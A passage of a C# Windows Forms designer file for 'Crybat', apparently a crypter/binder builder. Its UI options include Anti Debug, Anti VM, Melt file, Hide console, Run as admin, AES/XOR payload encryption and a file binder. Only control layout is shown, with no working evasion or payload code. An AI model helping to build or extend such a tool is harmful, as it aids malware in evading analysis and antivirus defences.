43 | this.iv6 = new System.Windows.Forms.TextBox();
44 | this.iv1 = new System.Windows.Forms.TextBox();
45 | this.key2 = new System.Windows.Forms.TextBox();
46 | this.label3 = new System.Windows.Forms.Label();
47 | this.key1 = new System.Windows.Forms.TextBox();
48 | this.label2 = new System.Windows.Forms.Label();
49 | this.xorEncryption = new System.Windows.Forms.CheckBox();
50 | this.aesEncryption = new System.Windows.Forms.CheckBox();
51 | this.binderPage = new System.Windows.Forms.TabPage();
52 | this.removeFile = new System.Windows.Forms.Button();
53 | this.addFile = new System.Windows.Forms.Button();
54 | this.listBox1 = new System.Windows.Forms.ListBox();
55 | this.outputPage = new System.Windows.Forms.TabPage();
56 | this.listBox2 = new System.Windows.Forms.ListBox();
57 | this.runas = new System.Windows.Forms.CheckBox();
58 | this.tabControl1.SuspendLayout();
59 | this.optionsPage.SuspendLayout();
60 | this.encryptionPage.SuspendLayout();
61 | this.binderPage.SuspendLayout();
62 | this.outputPage.SuspendLayout();
63 | this.SuspendLayout();
64 | //
65 | // label1
66 | //
67 | this.label1.AutoSize = true;
68 | this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
69 | this.label1.Location = new System.Drawing.Point(9, 14);
70 | this.label1.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
71 | this.label1.Name = "label1";
72 | this.label1.Size = new System.Drawing.Size(67, 18);
73 | this.label1.TabIndex = 0;
74 | this.label1.Text = "File path:";
75 | //
76 | // textBox1
77 | //
78 | this.textBox1.Location = new System.Drawing.Point(12, 35);
79 | this.textBox1.Margin = new System.Windows.Forms.Padding(2);
80 | this.textBox1.Name = "textBox1";
81 | this.textBox1.Size = new System.Drawing.Size(469, 22);
82 | this.textBox1.TabIndex = 1;
83 | //
84 | // openButton
85 | //
86 | this.openButton.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
87 | this.openButton.Location = new System.Drawing.Point(485, 34);
88 | this.openButton.Margin = new System.Windows.Forms.Padding(2);
89 | this.openButton.Name = "openButton";
90 | this.openButton.Size = new System.Drawing.Size(75, 25);
91 | this.openButton.TabIndex = 2;
92 | this.openButton.Text = "...";
93 | this.openButton.UseVisualStyleBackColor = true;
94 | this.openButton.Click += new System.EventHandler(this.openButton_Click);
95 | //
96 | // antiDebug
97 | //
98 | this.antiDebug.AutoSize = true;
99 | this.antiDebug.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
100 | this.antiDebug.Location = new System.Drawing.Point(4, 4);
101 | this.antiDebug.Margin = new System.Windows.Forms.Padding(2);
102 | this.antiDebug.Name = "antiDebug";
103 | this.antiDebug.Size = new System.Drawing.Size(101, 22);
104 | this.antiDebug.TabIndex = 6;
105 | this.antiDebug.Text = "Anti Debug";
106 | this.antiDebug.UseVisualStyleBackColor = true;
107 | //
108 | // buildButton
109 | //
110 | this.buildButton.Location = new System.Drawing.Point(11, 359);
111 | this.buildButton.Margin = new System.Windows.Forms.Padding(2);
112 | this.buildButton.Name = "buildButton";
113 | this.buildButton.Size = new System.Drawing.Size(550, 48);
114 | this.buildButton.TabIndex = 7;
115 | this.buildButton.Text = "Build";
116 | this.buildButton.UseVisualStyleBackColor = true;
117 | this.buildButton.Click += new System.EventHandler(this.buildButton_Click);
118 | //
119 | // selfDelete
120 | //
121 | this.selfDelete.AutoSize = true;
122 | this.selfDelete.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
123 | this.selfDelete.Location = new System.Drawing.Point(4, 56);
124 | this.selfDelete.Margin = new System.Windows.Forms.Padding(2);
125 | this.selfDelete.Name = "selfDelete";
126 | this.selfDelete.Size = new System.Drawing.Size(80, 22);
127 | this.selfDelete.TabIndex = 8;
128 | this.selfDelete.Text = "Melt file";
129 | this.selfDelete.UseVisualStyleBackColor = true;
130 | //
131 | // hidden
132 | //
133 | this.hidden.AutoSize = true;
134 | this.hidden.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
135 | this.hidden.Location = new System.Drawing.Point(4, 82);
136 | this.hidden.Margin = new System.Windows.Forms.Padding(2);
137 | this.hidden.Name = "hidden";
138 | this.hidden.Size = new System.Drawing.Size(117, 22);
139 | this.hidden.TabIndex = 9;
140 | this.hidden.Text = "Hide console";
141 | this.hidden.UseVisualStyleBackColor = true;
142 | //
143 | // antiVM
144 | //
145 | this.antiVM.AutoSize = true;
146 | this.antiVM.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
147 | this.antiVM.Location = new System.Drawing.Point(4, 30);
148 | this.antiVM.Margin = new System.Windows.Forms.Padding(2);
149 | this.antiVM.Name = "antiVM";
150 | this.antiVM.Size = new System.Drawing.Size(80, 22);
151 | this.antiVM.TabIndex = 10;
152 | this.antiVM.Text = "Anti VM";
153 | this.antiVM.UseVisualStyleBackColor = true;
154 | //
155 | // tabControl1
156 | //
157 | this.tabControl1.Controls.Add(this.optionsPage);
158 | this.tabControl1.Controls.Add(this.encryptionPage);
159 | this.tabControl1.Controls.Add(this.binderPage);
160 | this.tabControl1.Controls.Add(this.outputPage);
161 | this.tabControl1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
162 | this.tabControl1.Location = new System.Drawing.Point(12, 65);
163 | this.tabControl1.Margin = new System.Windows.Forms.Padding(2);
164 | this.tabControl1.Name = "tabControl1";
165 | this.tabControl1.SelectedIndex = 0;
166 | this.tabControl1.Size = new System.Drawing.Size(548, 290);
167 | this.tabControl1.TabIndex = 11;
168 | //
169 | // optionsPage
170 | //
171 | this.optionsPage.Controls.Add(this.runas);
172 | this.optionsPage.Controls.Add(this.hidden);
173 | this.optionsPage.Controls.Add(this.selfDelete);
174 | this.optionsPage.Controls.Add(this.antiDebug);
175 | this.optionsPage.Controls.Add(this.antiVM);
176 | this.optionsPage.Location = new System.Drawing.Point(4, 26);
177 | this.optionsPage.Margin = new System.Windows.Forms.Padding(2);
178 | this.optionsPage.Name = "optionsPage";
179 | this.optionsPage.Padding = new System.Windows.Forms.Padding(2);
180 | this.optionsPage.Size = new System.Drawing.Size(540, 260);
181 | this.optionsPage.TabIndex = 0;
182 | this.optionsPage.Text = "Options";
183 | this.optionsPage.UseVisualStyleBackColor = true;
184 | //
185 | // encryptionPage
186 | //
187 | this.encryptionPage.Controls.Add(this.refreshKeys);
188 | this.encryptionPage.Controls.Add(this.iv6);
189 | this.encryptionPage.Controls.Add(this.iv1);
190 | this.encryptionPage.Controls.Add(this.key2);
191 | this.encryptionPage.Controls.Add(this.label3);
192 | this.encryptionPage.Controls.Add(this.key1);
193 | this.encryptionPage.Controls.Add(this.label2);
194 | this.encryptionPage.Controls.Add(this.xorEncryption);
195 | this.encryptionPage.Controls.Add(this.aesEncryption);
196 | this.encryptionPage.Location = new System.Drawing.Point(4, 26);
197 | this.encryptionPage.Margin = new System.Windows.Forms.Padding(2);
198 | this.encryptionPage.Name = "encryptionPage";
199 | this.encryptionPage.Padding = new System.Windows.Forms.Padding(2);
200 | this.encryptionPage.Size = new System.Drawing.Size(540, 260);
201 | this.encryptionPage.TabIndex = 1;
202 | this.encryptionPage.Text = "Encryption";
203 | this.encryptionPage.UseVisualStyleBackColor = true;
204 | //
205 | // refreshKeys
206 | //
207 | this.refreshKeys.Location = new System.Drawing.Point(164, 194);
208 | this.refreshKeys.Margin = new System.Windows.Forms.Padding(2);
209 | this.refreshKeys.Name = "refreshKeys";
210 | this.refreshKeys.Size = new System.Drawing.Size(114, 25);
211 | this.refreshKeys.TabIndex = 9;
212 | this.refreshKeys.Text = "Refresh keys";
213 | this.refreshKeys.UseVisualStyleBackColor = true;
214 | this.refreshKeys.Click += new System.EventHandler(this.UpdateKeys);
215 | //
216 | // iv6
217 | //
218 | this.iv6.Location = new System.Drawing.Point(52, 156);
219 | this.iv6.Margin = new System.Windows.Forms.Padding(2);
220 | this.iv6.Name = "iv6";
221 | this.iv6.ReadOnly = true;
222 | this.iv6.Size = new System.Drawing.Size(226, 23);
223 | this.iv6.TabIndex = 8;
224 | //
225 | // iv1
226 | //
227 | this.iv1.Location = new System.Drawing.Point(52, 128);
228 | this.iv1.Margin = new System.Windows.Forms.Padding(2);
229 | this.iv1.Name = "iv1";
230 | this.iv1.ReadOnly = true;
231 | this.iv1.Size = new System.Drawing.Size(226, 23);
232 | this.iv1.TabIndex = 7;
233 | //
234 | // key2
235 | //
236 | this.key2.Location = new System.Drawing.Point(52, 96);
237 | this.key2.Margin = new System.Windows.Forms.Padding(2);
238 | this.key2.Name = "key2";
239 | this.key2.ReadOnly = true;
240 | this.key2.Size = new System.Drawing.Size(226, 23);
241 | this.key2.TabIndex = 6;
242 | //
243 | // label3
244 | //
245 | this.label3.AutoSize = true;
246 | this.label3.Location = new System.Drawing.Point(18, 131);
247 | this.label3.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
248 | this.label3.Name = "label3";
249 | this.label3.Size = new System.Drawing.Size(31, 17);
250 | this.label3.TabIndex = 5;
251 | this.label3.Text = "IVs:";
252 | //
253 | // key1
254 | //
255 | this.key1.Location = new System.Drawing.Point(52, 71);
256 | this.key1.Margin = new System.Windows.Forms.Padding(2);
257 | this.key1.Name = "key1";
258 | this.key1.ReadOnly = true;
259 | this.key1.Size = new System.Drawing.Size(226, 23);
260 | this.key1.TabIndex = 3;
261 | //
262 | // label2
263 | //
264 | this.label2.AutoSize = true;
265 | this.label2.Location = new System.Drawing.Point(6, 71);
266 | this.label2.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
267 | this.label2.Name = "label2";
268 | this.label2.Size = new System.Drawing.Size(43, 17);
269 | this.label2.TabIndex = 2;
270 | this.label2.Text = "Keys:";
271 | //
272 | // xorEncryption
273 | //
274 | this.xorEncryption.AutoSize = true;
275 | this.xorEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
276 | this.xorEncryption.Location = new System.Drawing.Point(4, 30);
277 | this.xorEncryption.Margin = new System.Windows.Forms.Padding(2);
278 | this.xorEncryption.Name = "xorEncryption";
279 | this.xorEncryption.Size = new System.Drawing.Size(63, 22);
280 | this.xorEncryption.TabIndex = 1;
281 | this.xorEncryption.Text = "XOR";
282 | this.xorEncryption.UseVisualStyleBackColor = true;
283 | this.xorEncryption.CheckedChanged += new System.EventHandler(this.xorEncryption_CheckedChanged);
284 | //
285 | // aesEncryption
286 | //
287 | this.aesEncryption.AutoSize = true;
288 | this.aesEncryption.Checked = true;
289 | this.aesEncryption.CheckState = System.Windows.Forms.CheckState.Checked;
290 | this.aesEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
291 | this.aesEncryption.Location = new System.Drawing.Point(4, 4);
292 | this.aesEncryption.Margin = new System.Windows.Forms.Padding(2);
293 | this.aesEncryption.Name = "aesEncryption";
294 | this.aesEncryption.Size = new System.Drawing.Size(59, 22);
295 | this.aesEncryption.TabIndex = 0;
296 | this.aesEncryption.Text = "AES";
297 | this.aesEncryption.UseVisualStyleBackColor = true;
298 | this.aesEncryption.CheckedChanged += new System.EventHandler(this.aesEncryption_CheckedChanged);
299 | //
300 | // binderPage
301 | //
302 | this.binderPage.Controls.Add(this.removeFile);
303 | this.binderPage.Controls.Add(this.addFile);
304 | this.binderPage.Controls.Add(this.listBox1);
305 | this.binderPage.Location = new System.Drawing.Point(4, 26);
306 | this.binderPage.Margin = new System.Windows.Forms.Padding(2);
307 | this.binderPage.Name = "binderPage";
308 | this.binderPage.Padding = new System.Windows.Forms.Padding(2);
309 | this.binderPage.Size = new System.Drawing.Size(540, 260);
310 | this.binderPage.TabIndex = 2;
311 | this.binderPage.Text = "Binder";
312 | this.binderPage.UseVisualStyleBackColor = true;
313 | //
314 | // removeFile
315 | //
316 | this.removeFile.Location = new System.Drawing.Point(122, 221);
317 | this.removeFile.Margin = new System.Windows.Forms.Padding(2);
318 | this.removeFile.Name = "removeFile";
319 | this.removeFile.Size = new System.Drawing.Size(116, 34);
320 | this.removeFile.TabIndex = 2;
321 | this.removeFile.Text = "Remove file";
322 | this.removeFile.UseVisualStyleBackColor = true;
323 | this.removeFile.Click += new System.EventHandler(this.removeFile_Click);
324 | //
325 | // addFile
326 | //
327 | this.addFile.Location = new System.Drawing.Point(2, 221);
328 | this.addFile.Margin = new System.Windows.Forms.Padding(2);
329 | this.addFile.Name = "addFile";
330 | this.addFile.Size = new System.Drawing.Size(116, 34);
331 | this.addFile.TabIndex = 1;
332 | this.addFile.Text = "Add file";
333 | this.addFile.UseVisualStyleBackColor = true;
334 | this.addFile.Click += new System.EventHandler(this.addFile_Click);
335 | //
336 | // listBox1
337 | //
338 | this.listBox1.FormattingEnabled = true;
339 | this.listBox1.ItemHeight = 17;
340 | this.listBox1.Location = new System.Drawing.Point(2, 5);
341 | this.listBox1.Margin = new System.Windows.Forms.Padding(2);
342 | this.listBox1.Name = "listBox1";
343 | this.listBox1.Size = new System.Drawing.Size(532, 208);
344 | this.listBox1.TabIndex = 0;
345 | //
346 | // outputPage
347 | //
348 | this.outputPage.Controls.Add(this.listBox2);
349 | this.outputPage.Location = new System.Drawing.Point(4, 26);
350 | this.outputPage.Margin = new System.Windows.Forms.Padding(2);
351 | this.outputPage.Name = "outputPage";
352 | this.outputPage.Padding = new System.Windows.Forms.Padding(2);
353 | this.outputPage.Size = new System.Drawing.Size(540, 260);
354 | this.outputPage.TabIndex = 3;
355 | this.outputPage.Text = "Output";
356 | this.outputPage.UseVisualStyleBackColor = true;
357 | //
358 | // listBox2
359 | //
360 | this.listBox2.FormattingEnabled = true;
361 | this.listBox2.ItemHeight = 17;
362 | this.listBox2.Location = new System.Drawing.Point(4, 4);
363 | this.listBox2.Margin = new System.Windows.Forms.Padding(2);
364 | this.listBox2.Name = "listBox2";
365 | this.listBox2.Size = new System.Drawing.Size(532, 242);
366 | this.listBox2.TabIndex = 4;
367 | //
368 | // runas
369 | //
370 | this.runas.AutoSize = true;
371 | this.runas.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
372 | this.runas.Location = new System.Drawing.Point(4, 108);
373 | this.runas.Margin = new System.Windows.Forms.Padding(2);
374 | this.runas.Name = "runas";
375 | this.runas.Size = new System.Drawing.Size(121, 22);
376 | this.runas.TabIndex = 11;
377 | this.runas.Text = "Run as admin";
378 | this.runas.UseVisualStyleBackColor = true;
379 | //
380 | // Form1
381 | //
382 | this.AutoScaleDimensions = new System.Drawing.SizeF(120F, 120F);
383 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi;
384 | this.ClientSize = new System.Drawing.Size(571, 418);
385 | this.Controls.Add(this.tabControl1);
386 | this.Controls.Add(this.buildButton);
387 | this.Controls.Add(this.openButton);
388 | this.Controls.Add(this.textBox1);
389 | this.Controls.Add(this.label1);
390 | this.DoubleBuffered = true;
391 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
392 | this.Margin = new System.Windows.Forms.Padding(2);
393 | this.MaximizeBox = false;
394 | this.Name = "Form1";
395 | this.ShowIcon = false;
396 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
397 | this.Text = "Crybat";
398 | this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing);
399 | this.Load += new System.EventHandler(this.Form1_Load);
400 | this.tabControl1.ResumeLayout(false);
401 | this.optionsPage.ResumeLayout(false);
402 | this.optionsPage.PerformLayout();
403 | this.encryptionPage.ResumeLayout(false);
404 | this.encryptionPage.PerformLayout();
405 | this.binderPage.ResumeLayout(false);
406 | this.outputPage.ResumeLayout(false);
407 | this.ResumeLayout(false);
408 | this.PerformLayout();
409 |
410 | }
411 |
412 | #endregion
413 |
414 | private System.Windows.Forms.Label label1;
415 | private System.Windows.Forms.TextBox textBox1;
416 | private System.Windows.Forms.Button openButton;
417 | private System.Windows.Forms.CheckBox antiDebug;
418 | private System.Windows.Forms.Button buildButton;
419 | private System.Windows.Forms.CheckBox selfDelete;
420 | private System.Windows.Forms.CheckBox hidden;
421 | private System.Windows.Forms.CheckBox antiVM;
422 | private System.Windows.Forms.TabControl tabControl1;
423 | private System.Windows.Forms.TabPage optionsPage;
424 | private System.Windows.Forms.TabPage encryptionPage;
425 | private System.Windows.Forms.CheckBox aesEncryption;
426 | private System.Windows.Forms.CheckBox xorEncryption;
427 | private System.Windows.Forms.TabPage binderPage;
428 | private System.Windows.Forms.TabPage outputPage;
429 | private System.Windows.Forms.Label label2;
430 | private System.Windows.Forms.TextBox key1;
431 | private System.Windows.Forms.Label label3;
432 | private System.Windows.Forms.Button addFile;
433 | private System.Windows.Forms.ListBox listBox1;
434 | private System.Windows.Forms.TextBox iv6;
435 | private System.Windows.Forms.TextBox iv1;
436 | private System.Windows.Forms.TextBox key2;
437 | private System.Windows.Forms.Button refreshKeys;
438 | private System.Windows.Forms.Button removeFile;
439 | private System.Windows.Forms.ListBox listBox2;
440 | private System.Windows.Forms.CheckBox runas;
441 | }
442 | }
443 |
--------------------------------------------------------------------------------